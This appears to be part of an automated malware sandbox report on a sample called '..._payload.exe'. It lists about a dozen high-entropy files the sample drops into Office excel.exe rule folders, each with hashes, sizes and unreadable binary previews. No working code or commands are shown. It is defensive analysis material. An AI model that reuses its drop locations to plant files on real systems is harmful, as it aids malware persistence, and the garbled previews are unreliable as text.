                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):752
                                                                                                                          Entropy (8bit):7.704598117966675
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:ALa0b3t48NCkoheDCbC4dBUnOAlwRRazxAk0U9nuLzUebqGUn+R43+q5bTcii9a:K7tnCDeDy7BuOAlwRRazd0suLXbqG8+0
                                                                                                                          MD5:B1E6BFD08FB769D96723265654177BE1
                                                                                                                          SHA1:1F20D012A72525DB42287E4558637B8190B4FC57
                                                                                                                          SHA-256:EEA7B35178727904E770104020B7A22324FAA5AEAFB9C0DC9F8817C36A12E8F2
                                                                                                                          SHA-512:61B6F04E18FDF8748B3DA694FEFDE4873A6970D3D7914B91983FBDFADDA872E9DEE9EFCF178319D57417A4C15695D290B247AE691ADB567C353F839ED04A6C75
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...u......gh4..~..P.w....[...D...[,K./.zI...6o.(..)*...4...r..\.L.F.1'.<........:?!.....c.["K.......i...z......D..."..0$.J.|....{i.jlU..P.d....Bb_\..7J..3..9./...Vi..PqN.....z.K...[e.Y.....VG.o.;..>.....{u.)#....q.A.>..6S..GX..<..t....#......~.B...$.v........._.7..=.-..+..ux....)..mg}..9z..9....3d.*6.^....*Nklz......<..d...pO...N:.......S(dS%z.=....t..z@.{.(..@e.I......$nq........[.".i].._..t1.6r..M^...q./.\..4.g..!...P..3M...xG....L&17.B..|.=.ea..I........ax..i.........C92..,.?.Qx...[......X....;.Qd.A.7.`.iQ.r.....C?.b ..T.fjo&.]..XJ_.....H..4@m@*..W.5....U.[.w.<7.....5cx.b7Gk..._\.......F...}......lL.........zR...!..8;....p..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule65138v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1094
                                                                                                                          Entropy (8bit):7.820317800972637
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:lzUgitD9EBy7Be4WxnMGUvRHZWP+OAKgJsVoTormY+bD:SD9EBy7uxMGERH2CyowF8D
                                                                                                                          MD5:2FDE605C06A3AFA58066028986FEFA7D
                                                                                                                          SHA1:582177F2C54BDE1F02BE5012C3F79CCD8603E1F7
                                                                                                                          SHA-256:F788169DD118939E53BE98EDD7E945E4450680F5BA4B5CB13BA5E4B76F2F1CCA
                                                                                                                          SHA-512:183A670480E208CA11C45FC4699BBBF2922B36141D4CE35FAC1E68CE3E605F55B149A23779CABF394863D17366EAD104088C012619E005A4F934C609918DE401
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml^-.?.%.wS....7....>....H.....V.~`...ce...E..m"?&g..N.?. V.H.... l8..y...W[.]...<.....9..e.e{.K.pT8k..zm....,yy(v.....k...}...G.8..... .T..c0.A...~.HI....{...0..l..D%...C'q...W..:}.ZPU....a....Cg-..8.T..`........k...z.yn}5.w.cQ]b..>.......g=...'.R...R...c...O..?i...a..\..1.....|......{....L..6...|.Hn..Zk.Kx.8.4)[%....Y.K..-.......e.|\......,r..o...me7.^~.....^...hK.%.|...KE.*...SS..&...(O..W|....Q.._.T......M....HA...n......(.>.l..+..i).C..v|...'.....V...4..06.D .)Z3...s.tQ.z',fI...}..@.....=.a..wG.HI]F.....co.....B...q..oe..6..#.}.].C...r........X?8RL...fi'ih....h._P....;...7....V+...8....3.f,/..*.yg}.$.b!.G..@K|z@/.z.......8.8.N......3j..Vy...j..=.,._B.j.8.....R..)/......R.%.......j.......-k*'C'..2...V].QmiT.@......4....r.K.....z..@QI.8..J..V.do.0..S.l.i...x...9e@&b.........B1...d..Xm.].......P.....0/..,-...n..O..1...a.B..7.,V.3......(....J.`.7...5jU.....Xn...@L.c..F.../nk5Up.t.j.....&G....2fk..I.".U.......@.7..Am..wK..&.I....0f....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule65139v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8095
                                                                                                                          Entropy (8bit):7.977572326085448
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:9W43zsE0kWMAIHMnxPcyu6/wo/ArNiYeXGh5H2kN3V:B3QElhHMJnu6jvYaGLWk/
                                                                                                                          MD5:D455FA2C053F6FC0FE187504935D7C22
                                                                                                                          SHA1:B767420D7C011BC24DE00152F44CF2FFF70FEB23
                                                                                                                          SHA-256:70F2F08D1908CB909B0C95E202E8CB08137065BE9CC799EFD2DFF915A14D57E4
                                                                                                                          SHA-512:40884E5408489BE55882772EC8D31B539E5AB19F505D53BA5DABF4446CC0E6DFA1168E4190FD2099BDD89C663A2FD6E21A031108B95AF2D1F493E839B5CD34D7
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....5.......?....Wp..4~>.T:t.........'+..m.-.\`.....F....Tw......p9..+7Z.I.1._.>|..GC......W..8..aj-.&3t %.tWS.8.......?.;..m..|....`.PFA9.f....UN.5<...%^..Q.h.ew..Ye`....~.[0....8"-......;..IH..,?....j....jr.,......~...x........e*..A..o.d..<..`/. M.)5...8.a.V....Lh..,.#...3.9...n........9..5!.. .........5I.p.k....[..=.(.O...b........N..w.v]=!..8.'.+..=&..Q\@....f..$..\...1.t4?.XE.'[@.a..x.......O.>6....%.h..bp'..8..q15....:@W...#8A.8.-7g..zO_`C.'.|.&....L.`,..?.M..]...q{.....*...T...hh`?.$5..l.%..@xK%q..#se....M.N`v../.U.'.\.._.^...j....................|....]p6.K..d..N.P.<.+.....SW.H>m.`E..I..3.....O}..n.y...R+..Q./<Qi..)8,a..f..3o..a.qP=...J.!.)b.^E;r'/. .s{o^z.L.r.%..H.x.3c.,8...y6.....<.<_T*Q`..5J..[.J...+..H0.A0s......Di\..e0.+...g.M....}...6F.^.9....B&..UoY`.5-!....~.il+'-BF..m]h.........Q.......P.e.E..;.^....v..W!.."L.'C..d.*v..'..i.7!.v............+W........B..R.*G.5/..=.!............<72...z......a.........Ek.....T

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68000v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1047
                                                                                                                          Entropy (8bit):7.795009821621016
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Ych7y3iLkY/SSkHvP409LAZ6N+W1YuScN71jTzwANXfCbk+BsKGbD:x7y3iLrmHVAEN+mRjTzwIXab6D
                                                                                                                          MD5:B73061A6CFB072FFB3E076F6BE27842D
                                                                                                                          SHA1:510E3F54DA74C32E033A4E50F22171EF9A19A468
                                                                                                                          SHA-256:DB287BC174522E569C7842EB467F1EC750ED735501F42C7F46DA1944AA420A54
                                                                                                                          SHA-512:384117B64CBB6D993B61E4F8E7ED8FC4EE48B273D510834459AA3273BEB477F6E9292030F8241A700CBD300F337D69569549995B3BE3A5E2971E2BEC8B8AB98C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml%.s,.T....v.JF.......<R...b..[.3.3aeT.F+....>.z........a;b..M.M.......E.ku.5.x...`..,....]..........n.T.{.h..5.na...E..N}*Q3...R.x..$....x.]....,..Ky.....j..|..es....pp0..1Aw...r.?....o.VWu...[i...tE..p.......@.......D.mj.D.....$...{...:....\.....;L ...).W.....at.J....x&.a.....r.'R.]..Y.N...:(of.......V...>.....r....y:..olV-R...V}-V.i.<.B..a7.|ZP[^.z.Pb.....a..-..y..........0.U..(......>.I>.......O.N6g..Ss.O.<..X+.uI[ ......W....N..;.}.....X.....6.a.l.q.d.D...y.S.1...`.@..x..Fo..se..R'.....b7-~[.!7&..[.`..]...... ..y.....h.&.[...R;.V.(._l.b\.....R...0Ehu. .eC.1...q.......a..]@.&:^.N.K....~...:.v...5\Y$..'Q.....3GN..9K.J..Wq.U..U`.....N..R].......cd.`.a...|... ..;pW7..L...k.....G.l.Ve.e.....T.0'...Kc9....v....T.Q....|......u.?...d..g........;.......y.. .{.'A..4..F....8]....w.QM.....-...t/..7.....{..8L...UTP2.U$Y..QX3...4...zT...x.Ouu..,.0.....D.:i)...;V."....%.G..:.0K....a..jh..I..Qu.phJtdHo970vyx7vwlYG00OakDR75RuJ

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68001v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1003
                                                                                                                          Entropy (8bit):7.778914403000284
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:csJXYjPGFYUVZpgiqrzOtHrooXvQ11pDUGYbD:ctOuU9gi3tkoXY1bUPD
                                                                                                                          MD5:6099640F7C035D6E676E62AD5182811C
                                                                                                                          SHA1:E10152BAD13CBC9A1E322A6A897E22DF0AAE89F8
                                                                                                                          SHA-256:BED40C4B82E5A90F1F9D5414537FDAE864D1AC8C2A507615104D8B6C97A2EEAE
                                                                                                                          SHA-512:A47389F45D6288771CD89D8850C0D41A3DF19854B6E830263D1D66B671757B4FD9EAD5D17BE29FD73527C99ECC8622575DD42AABA9BB72B51D8960507EC01195
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.......#..2.[....+.ANQ..M.. ..Ty..J.o0.......J..F>C.~...(.a..D(.Cn.c....)..r7.o........H...p....Gr.......uO:.uo8.s..f.4l9.lF\..}.$D6.&.k.i...9..fwbU.....P..|..5.@.4..y6..=h._..(.L...X].xi.....k.##..p.....L.HQK...;x....rG........I8.qi.. e&..........;.iZn....zaH........].....h....J..'......v.I......e`.....R.2bU.Y.(.......W8.$b..82.9@z....f.....'...J>|.8....z|#.?..$mm......&..>.........[....r.{ .....L..4.(.......?..DW.ZW.P.........Ch.f.. J.....A..Zx~.s.hIP....h.........UQ1"!.u4..J.F ...R=.u....3.....U..K..@.3Y..t.!we.+z..'..........F..i5#p.....6.....-p...H.6^...T.l..^....7.i......#.n.....7G.#"s.......y.d.E?....C.......!I.d.......&.@.......o.jab~a..6..`!zv./....))A......HiB..d.....vl.f#..z..1"7.1...Npr...E\.(8..R.......}Vp.nv..k.f6.+n......q..m.8..*.?......q.........S.O......P.k29.....N7r....O;.Z.!0."C.+..I..1.v...B:...$...-Y.c.y'.mn..c..k..+...,..h....:1.=.(@p...4.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4D

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68002v11.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2980
                                                                                                                          Entropy (8bit):7.939227410247842
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c6oRVtQkYOGb8+pss5uPRD3GLn7oVFePj32dsoSEhAY3gv5jLmgkhl4YZF8duAj5:c6oTCZb8js5uJD3GL75byS+h3gv5jKgT
                                                                                                                          MD5:6CCE60C6F602AA66EDAC50838836A300
                                                                                                                          SHA1:BBEDE87F6FFD585B8101A0432E2956B65EDC8ECD
                                                                                                                          SHA-256:08A5C45F3CCC7CC374B6955F43081BF125D57D3EC6A5C70D953E5EE04B562E7D
                                                                                                                          SHA-512:66F4BDECC20F704B7FEFE7695AA56A5A19BBFB3345F0283EF93867827C6A383472B1EB015309291225FAC29B64DD2B0E91C0052DA11BD7D993195E974814CDDA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..P.0r...I.$...........]6...{..t..<..y.......|.1Q.g.Y8.1.^...rw...H.n..Cl..Y.T..L+N....~.P..'......[..fG....I.......w....gk....$..|).:5{..+P.DbJ...Wng.......).|.O.H..G..)#.o.....x+.......p2..).Y.."..F5..........Y...fuM._DP.w.i1..l.$...)..M....._..9..(....c..(.L.1.0+.......\...Cl.E!.......}..^C.Q..^`>6,..:....7..../@C...@`....).<.>T.R.bL."....'..a.......z*..T.+..KD...0.o...+..;.N..8..Z.";.L=j...Fwv.;.i..........}H.h.{..4w+..)........u.$....uk...J...Y..q..g.=*..MQ.P.qx}$.5.rwT.4..wi?...#q&..-..%.......n.jh.._.n..>........orj1.m..(r2.........T..$jo.!......(...J........ ..a,.*..%e.T.rR......a...oe.w.K.?.LW].C$o+..EX..m....</.u.N&.....N......\:.=Z0Xn+...UW.2{..$..}...=...d.-e.D.3.d..*.W..J.<.........z..s.#=0a..C...=C.....3!.W.o./..U..&y.b..Q#..bh1k.........#R....I.H...b\....q ...3k|.|......z[...g.8./7C.*..._.f.^...)..].iQ.*.&ab.]....R"cgb...:/..B..//2L..q..#....<.D..A..7..{................-7I`.N.Tl...<...%!0.{xm..u[.nS.....}.Z6"E...2..7.H

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68003v12.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2672
                                                                                                                          Entropy (8bit):7.934994759277018
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:XR2NW9oVdK/PcTiazXewuUbdZ7JaJE0t1rrV4Aof11D:crVdK/kTRzOwpZ7cJEo1rpNY
                                                                                                                          MD5:452F0CED32B6A78DCC7D08E5AB0E5B63
                                                                                                                          SHA1:1011EB081F79CB1A7CE372D843F30F4DB3E7712F
                                                                                                                          SHA-256:9DC7826599665463DFA4471335F7568A720B677F65BDBA1D1F2B204A8A4E8B88
                                                                                                                          SHA-512:4D97D036A4DD7CAD2F8123C4B0333B7BCD1148AF7BEACE70D8CB3990B145822D0B47F532B4D2F47D2AC501D408F1EDC0B7B9C716810ACA793901F39E434331C6
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml$0...1O...&..N.=J.....L..Y._.A..H.]...U[.h.gah....8._&v>I......8.y....U5..P..D.5..s#..f.`..T.1...`6....J.OH<..H.k...3.'....B.I.U...D7...b=Kb.....}...>*I..K..gKy...r.<b....~>ZNN.~V..-{..o.B..).:X2..2........q....S./...LD..7>'...........o....+.........K....5y.7...i..*.]:m...8..g.YT..7..x.i.....G_.(.....7I.[.~V....0..H.....-..t=....S...b\.aj..XI#p.5.?C7*|.B.S.....h/!.s.|..yl.w.Wb.H.N..ey......e...-.....@...gr..".......@.;..v.....B_.[..:..j.Js A...d.\.K(D.$i.....e.R...?V.(.....Y3}....Y.<.....f(.)W........)[m8R...Q.j.q...0..Px.c.....d..+?..q...4.]...q.3C.U.R.f.H....&m..3N..3...I..79..VpWG.<.[~..b7.W...2.6..8....-F-...Le._9.NR... .....qr=C....&...4.7..O#.......ox7.pD;t....i.$!...M..4`.t2.^..II.c.*.v?%U...f......B.E3...Vg......z3E.....D.I...v.-\..Y...x..aV._.7..U#._.ja.f...R.B7..&C.^.4...~.....P,iR$q5...\NMe.P. .Uu=lST4...1.......?..O.?V.[.p..gX.iu..M5C..u..Xz.....-.c....;..{.....Dt....6....{.z..?...:....C.#..w...K...uT.Q..BB..e9.;Db...<z.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68004v16.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2762
                                                                                                                          Entropy (8bit):7.93898513735477
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:ZSGYIZsz8SBoTmnlo2J4LQFqjdxWt/q3tFLER9sTsLEjBwOWc58PfibpDD:Z44iGLQFqjdh3aTQjTHP
                                                                                                                          MD5:88B822DA16E9AA58ECDF8F130056C845
                                                                                                                          SHA1:39E83E2C8CE56676D9C7C104E870DB8A316718F8
                                                                                                                          SHA-256:2C3929C3585BB21756F665719BC5713D313CC52D46EBDDA972066A2D39DE8E5E
                                                                                                                          SHA-512:DCC697CBAD7283F121BB461F88483DE2DCBC197166D60653EB1102AE76742C4D3614CAE8E2E195A2A731D68409348AC2836A50F6174D38435E60C24B979D8654
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml[^.L...|O..1.U.,..XL.S.....]....7...G..}.B..}.CG.....:.u.p.p...6X^..P.7....o..d.<.b..1.n67G.C.(.h..D..,:.7*...$.cbQ..B...&.g...i#[>..Iy.'.j..T..._. ...K.@.T.R. ..z._..*..[m.e.$....<...q.....C[.z'....=..5V.8..W.=....= 5.a5..._.A.c...h.Ol..d.19.-..U..;...j]..v:.y)iqn7..`*...!.._.......l.ZC...V..*`.op..u..{...z...)...}..T.........}......M...L.P...E....c...1..a...u..S...:.N:.*b....c....zu...1v.F..@.a.FO.x.uB.m{..@md..".u.sS....P.9..;....-..B...uC..q...Z...G..c..KA.....h.z..e.*......%..!..J.......%....8fG.D.....1R./.On.DnM.,.....9Hz.i..Q...A...'E..e.A...p..hW.7.8P:.e....).]...?.y..h4..>...Gf....K..^.:NCEVz7..t..jpKz.k.St.......A.n..2".r&z..5.I.^.B.....M.C6.eo.a.HW.dailJ.<..d(...^.z..|..|n.Q=7.^.W..k0.y.T....|..1vu.C,.J...J.. :.[.1.l8.....R]1.o............j[j.,..4.....'..(..|....m.,.uvh....g~.V.h...yJIO..z..o..qy...`."..xQ.....y....x.......[@..L.L...d..F*u........C.:.....$GnD9.*-.o..4.ov7.......9..]M......$......P.o....>

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68006v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):838
                                                                                                                          Entropy (8bit):7.733311553750472
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:mrd8v4HnDFpuIYdkElXw67k/obo7qBmrP1bD:FYvu5kSf7kKslD
                                                                                                                          MD5:679EE480AD3B6B706793D51F8DED0343
                                                                                                                          SHA1:EB4A1BC9B1EAFC387F08BEE775C7292A42E08D62
                                                                                                                          SHA-256:9AE9E37A3270589154AB84E041FD729731F8E88C1B44B065D9AD0EC458EFB826
                                                                                                                          SHA-512:5DD511DB78C967085D365E3D36B9B136BECE64A7E91043ABFF4979FD5AF3A9C44907C00611D91855B055596A884CDE4813786B0412767A371D88A1DA2EE94E67
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlV..7.Wn..#...\ O..)c.-..&1...Y..g...U6.At?..8.~^..I.+_SP.N..-\t.V&............./].F.._....T...cV.7|,Y..(.Zro.p...q&....$.$e..|C`..Z...T.LBW.h...s.PQ.."....n...^e.1Z..h...\.rK...suv.v.V..D...j.x.C'.O:.Y?.a/wux6P...8H...&m.0.-..E6...........{>..'...6...]0...E.f..U.O....z..^......Q.....7./.C....J".PG...&...Ben9 .|.....4.4..b.>.H.......}.q....'........7.{........D.n......g....%.....p..S.x........@m..`...b6.&..W-.K.Z..b..x...F....dVH.*i.n.!..t.....C]...+;l...j.Q..gz[2.._sw9..\B..4.\.7..U...G..]..$........b..%$..6ETU\0.,Wt.+.^0.-..+...Mv....u....m...$l9N."/.........5...#l_..!..+.kZ..S..$'w.A.O.K.h.........Ibx........fe.n..8....1H..j.6....N...N...#2r......D..p.......5Cmn..t."...wt.T..........?.....s.)..qP.....phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68008v4.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1010
                                                                                                                          Entropy (8bit):7.758221564543903
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:plVYS6pCwa0kdZsISVglpVIVl+GCeLtjCbD:pQS6pE0kb8oyrtjQD
                                                                                                                          MD5:752C7FACC0955181BDAA638E6D057550
                                                                                                                          SHA1:483EF49E2430D63764587448939D0C208A751FDC
                                                                                                                          SHA-256:AC2ED23BBF8CEDAAC415834C1E5124D44797C1E0BB0FC6B5E8C660E005E0E13A
                                                                                                                          SHA-512:9CEDEE96BFFEAA41AE0144F437910B4172DAACBE8846C30E2543D0FFCEF0E008BD6A5547C8890938F02657091E77A57E17F23FA024B180E78A278C8558504940
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.0..s.v.N...d.}Tm.qO..6.*6..|...5..:akW...3#.M.w...4g...f9...-...>H..-FS.y>0...O..y,......uv.<.E..D...c.....s..Z......"..T..~....p..7zj..kN...r.]3;....A.F..[.u..{.5.....j......d..Cf.jw.i?.>.Lp....hE.3.0....n......%..-....M..=^..Nd].C#..C....{.h...}eh.....V}Y.K...%...HI...Pz.T...P].3..T5.2m....@Y/..aka.....K)j.!.2?..P..6.v...Ab..dz{.,J..W.8......5EL..Wd......}..6.3!.....8P....2..b.v9X.W..5..HRG...l.~..S|...p.<....8._1.N.[..}..G......34.....3......0..1.8s.?..-f6.*.{X..3:..........I..]a.-S..B.I.Hqa.z.[....&..?.m...u..#G#.p).T.....K.U...3..2!.e..l.Tn._.v..d.@......e.7..3...NT../.......}.S./...Cf..H....)..|.1....5....u..IQOd.o..y... .F.c......yA.G.z/..J..N....o.,.+.C.9.P8....X.........3.g.,>wG...k.Tf....[3..;Ft(...[;sN.5.Y...g.....o.*d..uDF.....~..v...h.k.$...?O2.w.9?.|..5...B.W1m.(.r..........D...*X.l..A\...-c..B.M.....k<. .7.$H.....kN..in/f.,.Fc.v.!_S...s..H....L.....k.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68009v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1380
                                                                                                                          Entropy (8bit):7.863031996029678
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:8ahraw5y2GZeFXFmxYrXg9AMVr3A+cu1uXbCMLBmupAh9ugPTh3CLG3IkMhatERw:i8rKxSwiMhw+cIuGM1mupmYgPJIhaLnD
                                                                                                                          MD5:C2A2DF0BC7DBD495B98DC40A751E63C7
                                                                                                                          SHA1:257BE69E89685D2C310BEBAF42ADE317D11DB724
                                                                                                                          SHA-256:ED96DE9C951F28CBF7AE998D309A6D71FECFF155A3DCB482628E56D3D46D2C1A
                                                                                                                          SHA-512:5E3FECF969E268BBA7B429F458AAEA8C983911453680B32DB8863530F206486B0573ED561E868A96E9E0496E49BF17EE5CB7168BA74FB43C3AED8390A42C71D3
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml9..f|.1...@..]...<...:.g.@K......u0.oD.-m3?o..G....9Q.D..,{....8{b.J.n..(.+..%..(..#.w/...~.........S-..?r...7>....W.8["...7...*..8.Y....m..-.lr...q..../x..o..il.?V!..c.'X...Sl.[.....`.....0.....yx/..h..-.j...E.B ..u../...VD.ws..j.*.f9$....`...&{.xh...Y....w.{e.I.n.4O.n<...Q.....?X.G...j|lf..x.....q:...I.!.k.....%.n.w"..U'..j..9^.#^...$.........Q....R.&....q*.6x+.[..Zo...1@R^.X...7l .iC.....v..[:%.9.U..v.W..".s..q_.i94.x..J.~..r..t.>.3.._.J.Dm....`..x.5x.-B..,U.EU.?F|.......<..Y.1;......0.B....4Z..._.&2f^.XX....~...T...5......5.@v.....=....3`6..;..i........e..#..s....9.Kd......~@G.!D...z...`..}G.....ko@Af..Wo#.pu..../..;..b7.c...a.....N8>.}....[..U.#..[.:.-..K%!...Zb.iq.....G....a......).......:B...x|.G..tPU(.......r(.g..}A..P...........\.q.,....L..o_.[9)~bL..B....@9.'. ..>......a..+..8.xe..S....mP{.%;.Qa..Hg..p....7.r......|...m..._7l.p.....m..<..1.8..P.nr......d...-G.yKY...P.$.r.....'...(.."..x.8......Ko1.O.P..Y."1.:.RwCJH:.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68010v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1614
                                                                                                                          Entropy (8bit):7.8787492020109475
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:iIhSzUiuWPLeg5fnqVbis70tsJObH0KTZh+p7DPw6fUcD:DhpDgpC73owKTZy7jw6fUY
                                                                                                                          MD5:E3D30059761F1EBB7F3EC412381F8CC2
                                                                                                                          SHA1:96C50D566AF8C6EA31EA483C3D45C3317CAEA3D9
                                                                                                                          SHA-256:982DA3FE4942050A7DB24D9524C33ED8899789BBD89408233492265220AEA33B
                                                                                                                          SHA-512:AA649CBBF2B603660F5F69F22383C00C31DF5B0856BC5CD22977D0C7A04F9D21ECBFE5F2C3811FA19B02EAFDE520CC20E680AEC4310D104EEC44FDDE0B233C9A
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.......~..1....]9P...".+.`..R3.AO..0?..p......?.=..)..a..i.L......Ri.SK.Dq4....%.k}..C2.....?Z.'*......Ysz...X.7.ON:....<...c........\.u.p....T..y_.#..=.../....{..D.la......@Q.e...jo..`...,....U. ..%c.."...Z.........aY.r..BF9...h...bw.....Qh.`..(.D(U...X]..9....$wTf.e`..'..qT..+Zz.9....}.O.Z..<+(`...(?2y..N.?5E.....K..2.2|X...N..A.D.c....K...i..,.n_.s..%F..b..9z.}...CV.>$..W..y#.........'.....Cm.L....a.m.9...r..!...J.=.S5,..u.98C.6..gh.K....[\..m!Mk;Ap.......XRWY...._!.9.y..J...b.a....@+..r0.a^0.......^`.....8.cv?.6xZL......H..nO..%.+8Rm..`..6...G.W...Q.*..&7...y..t#a*.[...rp~8......F.B.|........w..d+..llEZ.._.`.KZ.9[.@..1..OMG.Wg}.....?Pv$.u.f.z.g.f%.l...G{............u.do:..L..6!|.EV.........}..>....&...-.=...S.H...5..LA.?.[.y.3..o.....'.b!...._......J-..s?....A'......U.Y.>.=.A......RN.U.@.6.%~m...?...x..:....>E<.*.&....@{...U#.....+.5..._,d.I.....f...{.3..J$s+`..X.6.V....o"u.1.!!.....H..].jN$..e...<A..Q.c...R+.d..}.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68011v4.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2753
                                                                                                                          Entropy (8bit):7.931638139889642
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:Ob1rz6VqfK6/dGX3nEhRC4EU62voPUU8tLFe0BwFxHjLnDtrD:Odz6U//dZhb5/v+RaeOExJ
                                                                                                                          MD5:4F6A9DBE6843A869B3E1941D3AF93C28
                                                                                                                          SHA1:3D925F5F56FB9EBBA8584EAA50631A522069A6C9
                                                                                                                          SHA-256:93D72066323ADCAF57B8A4270A99D4F8FDF87BB8921C3E2F893CB297999DF6A1
                                                                                                                          SHA-512:964D8DA5B65F7B84D2619E779D81D87DE9D65BF37C3CE17D5E950AC36EEF130190C9B0E72DE08FFDD8E95081C7FC5855E2D3200A1BA89F5920FD6C00633E5E2D
                                                                                                                          Malicious:false
